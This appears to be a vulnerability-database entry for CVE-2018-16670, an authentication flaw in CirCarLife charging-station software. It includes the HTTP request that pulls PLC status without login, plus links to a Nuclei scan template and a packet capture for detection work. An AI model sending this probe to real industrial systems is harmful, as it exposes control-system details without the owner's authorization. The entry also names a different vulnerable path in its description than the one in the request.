🔙 목록으로 돌아가기

CVE-2018-16670: CirCarLife <4.3 - Improper Authentication

TitleCirCarLife <4.3 - Improper Authentication
Authorgeeknik
SeverityMedium
ImpactUnauthenticated attackers can obtain sensitive PLC status information without authentication due to improper access controls, potentially revealing critical industrial control system details.
RemediationUpgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.
CVSS Score5.3
EPSS Score0.45583
CVE IDCVE-2018-16670
CWE IDCWE-287
Tags cve cve2018 scada plc iot disclosure edb circarlife circontrol vkev vuln

🔍 Vulnerability Description

CirCarLife before 4.3 is susceptible to improper authentication. A PLC status disclosure exists due to lack of authentication for /html/devstat.html. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /services/user/values.xml?var=STATUS HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16670.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-16670.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A